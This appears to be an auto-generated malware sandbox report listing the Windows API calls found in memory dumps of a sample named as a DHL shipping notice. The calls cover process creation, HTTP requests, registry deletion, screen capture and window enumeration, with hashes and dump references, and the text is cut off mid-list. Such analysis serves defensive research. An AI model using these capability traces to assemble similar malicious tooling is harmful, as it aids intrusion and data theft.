                                                                                      • _wcslen.LIBCMT ref: 00E2B198
                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E2B1B0
                                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E2B1D4
                                                                                      • _wcslen.LIBCMT ref: 00E2B200
                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E2B214
                                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E2B236
                                                                                      • _wcslen.LIBCMT ref: 00E2B332
                                                                                        • Part of subcall function 00E105A7: GetStdHandle.KERNEL32(000000F6), ref: 00E105C6
                                                                                      • _wcslen.LIBCMT ref: 00E2B34B
                                                                                      • _wcslen.LIBCMT ref: 00E2B366
                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E2B3B6
                                                                                      • GetLastError.KERNEL32(00000000), ref: 00E2B407
                                                                                      • CloseHandle.KERNEL32(?), ref: 00E2B439
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00E2B44A
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00E2B45C
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00E2B46E
                                                                                      • CloseHandle.KERNEL32(?), ref: 00E2B4E3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                      • String ID:
                                                                                      • API String ID: 2178637699-0
                                                                                      • Opcode ID: 0fbc5f2628e4b4c5950b7ad5e181a2a395cad439ff4ae819b64d8575ebb5f7c8
                                                                                      • Instruction ID: 1e1683503e07ecd56560dfa2a052a159f9f453e14c0e1a1f276af6c4d0b34cf8
                                                                                      • Opcode Fuzzy Hash: 0fbc5f2628e4b4c5950b7ad5e181a2a395cad439ff4ae819b64d8575ebb5f7c8
                                                                                      • Instruction Fuzzy Hash: 5BF19A31604310DFC714EF24D891B6ABBE1EF85314F18995DF899AB2A2DB70EC44CB62
                                                                                      APIs
                                                                                      • GetMenuItemCount.USER32(00E71990), ref: 00DE2F8D
                                                                                      • GetMenuItemCount.USER32(00E71990), ref: 00DE303D
                                                                                      • GetCursorPos.USER32(?), ref: 00DE3081
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 00DE308A
                                                                                      • TrackPopupMenuEx.USER32(00E71990,00000000,?,00000000,00000000,00000000), ref: 00DE309D
                                                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00DE30A9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                      • String ID: 0
                                                                                      • API String ID: 36266755-4108050209
                                                                                      • Opcode ID: 90328b003b56120079b0c21159440bb6cc068d4b089698e7f75d47bce1100e57
                                                                                      • Instruction ID: 6f377f4a4fc013debcf2b33dbd7793d9067e149e93323b4e90b7824821e5ff58
                                                                                      • Opcode Fuzzy Hash: 90328b003b56120079b0c21159440bb6cc068d4b089698e7f75d47bce1100e57
                                                                                      • Instruction Fuzzy Hash: AA712731640255BEEB219F2ACC49FAABF69FF01364F244206F5147A1E0C7B1ED54CBA0
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(?,?), ref: 00E36DEB
                                                                                        • Part of subcall function 00DA6B57: _wcslen.LIBCMT ref: 00DA6B6A
                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00E36E5F
                                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00E36E81
                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E36E94
                                                                                      • DestroyWindow.USER32(?), ref: 00E36EB5
                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00DA0000,00000000), ref: 00E36EE4
                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E36EFD
                                                                                      • GetDesktopWindow.USER32 ref: 00E36F16
                                                                                      • GetWindowRect.USER32(00000000), ref: 00E36F1D
                                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E36F35
                                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00E36F4D
                                                                                        • Part of subcall function 00DB9944: GetWindowLongW.USER32(?,000000EB), ref: 00DB9952
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                      • String ID: 0$tooltips_class32
                                                                                      • API String ID: 2429346358-3619404913
                                                                                      • Opcode ID: daaf5406e61c5e6c88ce10f17a56513af3629a010ce94f0bc325cd1d20890c49
                                                                                      • Instruction ID: c037022fe44eff9399ef971734aacd10c7d0043806d6b3ba963e139d2918c70f
                                                                                      • Opcode Fuzzy Hash: daaf5406e61c5e6c88ce10f17a56513af3629a010ce94f0bc325cd1d20890c49
                                                                                      • Instruction Fuzzy Hash: E5716E74104344AFDB21CF29D848A66BBF9FB89708F14541DF699A7261C770E949CB22
                                                                                      APIs
                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E1C4B0
                                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00E1C4C3
                                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00E1C4D7
                                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00E1C4F0
                                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00E1C533
                                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00E1C549
                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E1C554
                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00E1C584
                                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00E1C5DC
                                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00E1C5F0
                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00E1C5FB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                      • String ID:
                                                                                      • API String ID: 3800310941-3916222277
                                                                                      • Opcode ID: 691c9106e149ca43702f8adc684ad757c8f7eeaeb6974a0284088c073ba34782
                                                                                      • Instruction ID: c3a83ce651cc9c78ea20da1a2468b853b02d1b59425b1e89bd3aa19b77f66f81
                                                                                      • Opcode Fuzzy Hash: 691c9106e149ca43702f8adc684ad757c8f7eeaeb6974a0284088c073ba34782
                                                                                      • Instruction Fuzzy Hash: E1513AB1540608BFDB218F65C988AFB7BFDFB08758F20541AF945F6210DB34E9889B61
                                                                                      APIs
                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00E38592
                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00E385A2
                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00E385AD
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00E385BA
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00E385C8
                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00E385D7
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00E385E0
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00E385E7
                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00E385F8
                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00E3FC38,?), ref: 00E38611
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00E38621
                                                                                      • GetObjectW.GDI32(?,00000018,000000FF), ref: 00E38641
                                                                                      • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00E38671
                                                                                      • DeleteObject.GDI32(00000000), ref: 00E38699
                                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00E386AF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                      • String ID:
                                                                                      • API String ID: 3840717409-0
                                                                                      • Opcode ID: bfd8c638f0d643b3bd9989e6f851a51a2275a7432ab596c8ba440562ad1e9b5a
                                                                                      • Instruction ID: 3bcb69233a6fc6b3e037643f3ac7de8caeae0addde662d6867eb0aeb2e675f25
                                                                                      • Opcode Fuzzy Hash: bfd8c638f0d643b3bd9989e6f851a51a2275a7432ab596c8ba440562ad1e9b5a
                                                                                      • Instruction Fuzzy Hash: E541E875600208AFDB119FA6DD8DEAA7FB8EF89B15F208058F905F7260DB30D905DB60
                                                                                      APIs
                                                                                      • VariantInit.OLEAUT32(00000000), ref: 00E11502
                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00E1150B
                                                                                      • VariantClear.OLEAUT32(?), ref: 00E11517
                                                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00E115FB
                                                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 00E11657
                                                                                      • VariantInit.OLEAUT32(?), ref: 00E11708
                                                                                      • SysFreeString.OLEAUT32(?), ref: 00E1178C
                                                                                      • VariantClear.OLEAUT32(?), ref: 00E117D8
                                                                                      • VariantClear.OLEAUT32(?), ref: 00E117E7
                                                                                      • VariantInit.OLEAUT32(00000000), ref: 00E11823
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                      • API String ID: 1234038744-3931177956
                                                                                      • Opcode ID: 2fd01a52e0b9846c9a19b5a612c3772e4e69a43dd344b00413f73e420479f871
                                                                                      • Instruction ID: 502f2837f9e53c1879ddacde271b50bad60a7ae97dc05833d28e278fc59e6c3c
                                                                                      • Opcode Fuzzy Hash: 2fd01a52e0b9846c9a19b5a612c3772e4e69a43dd344b00413f73e420479f871
                                                                                      • Instruction Fuzzy Hash: 0FD1EE31A00615EBDB109F65D885BFDB7B6FF45700F20819AE646BB280DB30ED84DB62
                                                                                      APIs
                                                                                        • Part of subcall function 00DA9CB3: _wcslen.LIBCMT ref: 00DA9CBD
                                                                                        • Part of subcall function 00E2C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E2B6AE,?,?), ref: 00E2C9B5
                                                                                        • Part of subcall function 00E2C998: _wcslen.LIBCMT ref: 00E2C9F1
                                                                                        • Part of subcall function 00E2C998: _wcslen.LIBCMT ref: 00E2CA68
                                                                                        • Part of subcall function 00E2C998: _wcslen.LIBCMT ref: 00E2CA9E
                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E2B6F4
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E2B772
                                                                                      • RegDeleteValueW.ADVAPI32(?,?), ref: 00E2B80A
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00E2B87E
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00E2B89C
                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00E2B8F2
                                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E2B904
                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00E2B922
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00E2B983
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00E2B994
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                      • API String ID: 146587525-4033151799
                                                                                      • Opcode ID: 90da155bbdb39539bbb5405f450bd92cd00afacfa8e92d36900be156c12ff447
                                                                                      • Instruction ID: a5772e756933fc407dfab059a354c7d20caf6ffffc5aee9fcfb3f3d82a263ad0
                                                                                      • Opcode Fuzzy Hash: 90da155bbdb39539bbb5405f450bd92cd00afacfa8e92d36900be156c12ff447
                                                                                      • Instruction Fuzzy Hash: D1C1BE30204211AFD714DF24D495F2ABBE5FF85318F18955CF59AAB2A2CB31EC45CBA1
                                                                                      APIs
                                                                                      • GetDC.USER32(00000000), ref: 00E225D8
                                                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00E225E8
                                                                                      • CreateCompatibleDC.GDI32(?), ref: 00E225F4
                                                                                      • SelectObject.GDI32(00000000,?), ref: 00E22601
                                                                                      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00E2266D
                                                                                      • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00E226AC
                                                                                      • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00E226D0
                                                                                      • SelectObject.GDI32(?,?), ref: 00E226D8
                                                                                      • DeleteObject.GDI32(?), ref: 00E226E1
                                                                                      • DeleteDC.GDI32(?), ref: 00E226E8
                                                                                      • ReleaseDC.USER32(00000000,?), ref: 00E226F3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                      • String ID: (
                                                                                      • API String ID: 2598888154-3887548279
                                                                                      • Opcode ID: a482a65d9d960693ba68161cfea933601a9b75bc39a0321ceb959ed083b60ae0
                                                                                      • Instruction ID: abcd70bbb89a89122d58a8ee6bef8e5d09aa4ad874617a917ec67d8d0485eb04
                                                                                      • Opcode Fuzzy Hash: a482a65d9d960693ba68161cfea933601a9b75bc39a0321ceb959ed083b60ae0
                                                                                      • Instruction Fuzzy Hash: 9F61D276D00219EFCB14CFA4D888AAEBBF5FF48310F208529EA55B7250D774A951DFA0
                                                                                      APIs
                                                                                      • ___free_lconv_mon.LIBCMT ref: 00DDDAA1
                                                                                        • Part of subcall function 00DDD63C: _free.LIBCMT ref: 00DDD659
                                                                                        • Part of subcall function 00DDD63C: _free.LIBCMT ref: 00DDD66B
                                                                                        • Part of subcall function 00DDD63C: _free.LIBCMT ref: 00DDD67D
                                                                                        • Part of subcall function 00DDD63C: _free.LIBCMT ref: 00DDD68F
                                                                                        • Part of subcall function 00DDD63C: _free.LIBCMT ref: 00DDD6A1
                                                                                        • Part of subcall function 00DDD63C: _free.LIBCMT ref: 00DDD6B3
                                                                                        • Part of subcall function 00DDD63C: _free.LIBCMT ref: 00DDD6C5
                                                                                        • Part of subcall function 00DDD63C: _free.LIBCMT ref: 00DDD6D7
                                                                                        • Part of subcall function 00DDD63C: _free.LIBCMT ref: 00DDD6E9
                                                                                        • Part of subcall function 00DDD63C: _free.LIBCMT ref: 00DDD6FB
                                                                                        • Part of subcall function 00DDD63C: _free.LIBCMT ref: 00DDD70D
                                                                                        • Part of subcall function 00DDD63C: _free.LIBCMT ref: 00DDD71F
                                                                                        • Part of subcall function 00DDD63C: _free.LIBCMT ref: 00DDD731
                                                                                      • _free.LIBCMT ref: 00DDDA96
                                                                                        • Part of subcall function 00DD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00DDD7D1,00000000,00000000,00000000,00000000,?,00DDD7F8,00000000,00000007,00000000,?,00DDDBF5,00000000), ref: 00DD29DE
                                                                                        • Part of subcall function 00DD29C8: GetLastError.KERNEL32(00000000,?,00DDD7D1,00000000,00000000,00000000,00000000,?,00DDD7F8,00000000,00000007,00000000,?,00DDDBF5,00000000,00000000), ref: 00DD29F0
                                                                                      • _free.LIBCMT ref: 00DDDAB8
                                                                                      • _free.LIBCMT ref: 00DDDACD
                                                                                      • _free.LIBCMT ref: 00DDDAD8
                                                                                      • _free.LIBCMT ref: 00DDDAFA
                                                                                      • _free.LIBCMT ref: 00DDDB0D
                                                                                      • _free.LIBCMT ref: 00DDDB1B
                                                                                      • _free.LIBCMT ref: 00DDDB26
                                                                                      • _free.LIBCMT ref: 00DDDB5E
                                                                                      • _free.LIBCMT ref: 00DDDB65
                                                                                      • _free.LIBCMT ref: 00DDDB82
                                                                                      • _free.LIBCMT ref: 00DDDB9A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                      • String ID:
                                                                                      • API String ID: 161543041-0
                                                                                      • Opcode ID: 9064d0ce1542ba19d3659116b0450715dc6a4f226a8c2ba704a7982b66d57011
                                                                                      • Instruction ID: f4060620117c392e0250281765c6beb7e209f2f4f608b34848027ef6e1f5bac2
                                                                                      • Opcode Fuzzy Hash: 9064d0ce1542ba19d3659116b0450715dc6a4f226a8c2ba704a7982b66d57011
                                                                                      • Instruction Fuzzy Hash: 26314A316446059FEF21AA39EC45B6A77EAFF20314F29941BE459D7391DB31AC409B30
                                                                                      APIs
                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00E0369C
                                                                                      • _wcslen.LIBCMT ref: 00E036A7
                                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00E03797
                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00E0380C
                                                                                      • GetDlgCtrlID.USER32(?), ref: 00E0385D
                                                                                      • GetWindowRect.USER32(?,?), ref: 00E03882
                                                                                      • GetParent.USER32(?), ref: 00E038A0
                                                                                      • ScreenToClient.USER32(00000000), ref: 00E038A7
                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00E03921
                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00E0395D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                      • String ID: %s%u
                                                                                      • API String ID: 4010501982-679674701
                                                                                      • Opcode ID: 15217cdf812d5bb686306a21e449dc98057e2ef190e2b8ad594e7a2786c869fa
                                                                                      • Instruction ID: b3657b6c9185cb0ed9b649571fd0057b432597ed9a647bb7e4eab1904f6b2c1e
                                                                                      • Opcode Fuzzy Hash: 15217cdf812d5bb686306a21e449dc98057e2ef190e2b8ad594e7a2786c869fa
                                                                                      • Instruction Fuzzy Hash: 3B91BE71204606AFD718DF34C885FAAF7ACFF44354F509629F999A21D0DB30EA85CBA1
                                                                                      APIs
                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00E04994
                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00E049DA
                                                                                      • _wcslen.LIBCMT ref: 00E049EB
                                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 00E049F7
                                                                                      • _wcsstr.LIBVCRUNTIME ref: 00E04A2C
                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00E04A64
                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00E04A9D
                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00E04AE6
                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00E04B20
                                                                                      • GetWindowRect.USER32(?,?), ref: 00E04B8B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                      • String ID: ThumbnailClass
                                                                                      • API String ID: 1311036022-1241985126
                                                                                      • Opcode ID: 1954f70496457925e4d4d81dcbf8b6172d422a789a211b56c939c5e037215b29
                                                                                      • Instruction ID: d74686f322de3a1b76a5ae18d071f5cef4facac108aae9885ae4525ba2de3dcb
                                                                                      • Opcode Fuzzy Hash: 1954f70496457925e4d4d81dcbf8b6172d422a789a211b56c939c5e037215b29
                                                                                      • Instruction Fuzzy Hash: 829190F11042059FDB04DF14CA85BAAB7E8EF84758F045469FE85AA0D6EB30ED85CBA1
                                                                                      APIs
                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00E2CC64
